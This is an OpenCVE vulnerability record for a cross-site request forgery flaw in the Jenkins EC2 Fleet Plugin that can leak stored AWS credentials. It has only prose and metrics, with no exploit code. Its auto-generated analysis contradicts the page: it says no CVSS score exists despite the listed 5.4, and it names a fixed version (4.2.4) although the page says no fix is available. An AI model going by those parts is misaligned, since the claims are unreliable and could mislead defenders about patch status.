Description
A cross-site request forgery (CSRF) vulnerability in Jenkins EC2 Fleet Plugin 4.2.3.539.v8fedff2a_81c3 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing AWS credentials stored in Jenkins.
Published: 2026-06-24
Score: 5.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The Jenkins EC2 Fleet Plugin contains a cross‑site request forgery flaw that allows an attacker to send a crafted request to the plugin's endpoint. By supplying a credentials ID that the attacker already has access to, the plugin will connect to a URL specified by the attacker and can expose the AWS credentials stored in Jenkins. This flaw directly leads to credential theft and subsequent unauthorized access to AWS resources.

Affected Systems

Jenkins EC2 Fleet Plugin versions 4.2.3.539.v8fedff2a_81c3 and earlier.

Risk and Exploitability

The CVSS score is not provided and the EPSS score is unavailable, indicating that known exploitation is not widely documented. The vulnerability is a CSRF type, typically exploited by having a victim perform a privileged action in Jenkins without proper token validation. An attacker must already possess a valid credentials ID and drive a victim to submit a crafted request. The risk is contingent upon the presence of such IDs and the web access available to attacker; the flaw alone does not provide arbitrary code execution.

Generated by OpenCVE AI on June 24, 2026 at 15:08 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Plugin to the latest version that fixes the CSRF issue (for example, 4.2.4 or later).
  • Revoke any AWS credentials that may have been compromised by the plugin and generate new credentials, then update Jenkins with the new values.
  • Disable the plugin's ability to use arbitrary credentials IDs until a patch is applied, such as removing the plugin or restricting its permissions. (Optional)
  • Enable CSRF protection in the Jenkins system configuration and enforce token validation for configuration changes as a temporary workaround.

Generated by OpenCVE AI on June 24, 2026 at 15:08 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 24 Jun 2026 16:30:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Wed, 24 Jun 2026 15:30:00 +0000

Type Values Removed Values Added
Title Cross‑Site Request Forgery in Jenkins EC2 Fleet Plugin Leading to AWS Credentials Exposure
Weaknesses CWE-200
CWE-352

Wed, 24 Jun 2026 13:45:00 +0000

Type Values Removed Values Added
Description A cross-site request forgery (CSRF) vulnerability in Jenkins EC2 Fleet Plugin 4.2.3.539.v8fedff2a_81c3 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing AWS credentials stored in Jenkins.
References

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: jenkins

Published:

Updated: 2026-06-24T15:16:42.103Z

Reserved: 2026-06-24T08:41:44.358Z

Link: CVE-2026-57295

cve-icon Vulnrichment

Updated: 2026-06-24T15:16:24.145Z

cve-icon NVD

No data.

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-24T15:15:04Z

Weaknesses
  • CWE-200

    Exposure of Sensitive Information to an Unauthorized Actor

  • CWE-352

    Cross-Site Request Forgery (CSRF)